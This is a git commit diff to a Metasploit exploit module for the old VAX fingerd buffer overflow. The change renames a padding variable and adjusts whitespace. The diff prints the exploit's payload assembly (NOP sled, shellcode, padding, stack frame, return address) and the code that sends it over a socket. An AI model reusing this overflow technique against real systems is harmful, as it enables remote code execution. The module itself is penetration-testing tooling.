Explain "junk" in buffer for morris_fingerd_bof
And unrelated whitespace changes because I suck.GSoC/Meterpreter_Web_Console
parent
f2f5b3c8fa
commit
8a402da056
|
@ -85,24 +85,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# 0x01 is NOP in VAX-speak
|
# 0x01 is NOP in VAX-speak
|
||||||
nops = "\x01" * (target.payload_space - shellcode.length)
|
nops = "\x01" * (target.payload_space - shellcode.length)
|
||||||
|
|
||||||
# This overwrites part of the buffer
|
# This pads past buffer corruption
|
||||||
junk = rand_text_alphanumeric(109)
|
padding = rand_text_alphanumeric(109)
|
||||||
|
|
||||||
# This zeroes out part of the stack frame
|
# This zeroes out part of the stack frame
|
||||||
frame = "\x00" * 16
|
frame = "\x00" * 16
|
||||||
|
|
||||||
# Finally, pack in our return address
|
# Finally, pack in our return address
|
||||||
ret = [target.ret].pack('V') # V is for VAX!
|
ret = [target.ret].pack('V') # V is for VAX!
|
||||||
|
|
||||||
# The newline is for gets(3)
|
# The newline is for gets(3)
|
||||||
sploit = nops + shellcode + junk + frame + ret + "\n"
|
sploit = nops + shellcode + padding + frame + ret + "\n"
|
||||||
|
|
||||||
# Fire away
|
# Fire away
|
||||||
print_status('Connecting to fingerd')
|
print_status('Connecting to fingerd')
|
||||||
connect
|
connect
|
||||||
print_status("Sending #{sploit.length}-byte buffer")
|
print_status("Sending #{sploit.length}-byte buffer")
|
||||||
sock.put(sploit)
|
sock.put(sploit)
|
||||||
|
|
||||||
# Hat tip @bcoles
|
# Hat tip @bcoles
|
||||||
rescue Rex::ConnectionError => e
|
rescue Rex::ConnectionError => e
|
||||||
fail_with(Failure::Unreachable, e.message)
|
fail_with(Failure::Unreachable, e.message)
|
||||||
|
|
Loading…
Reference in New Issue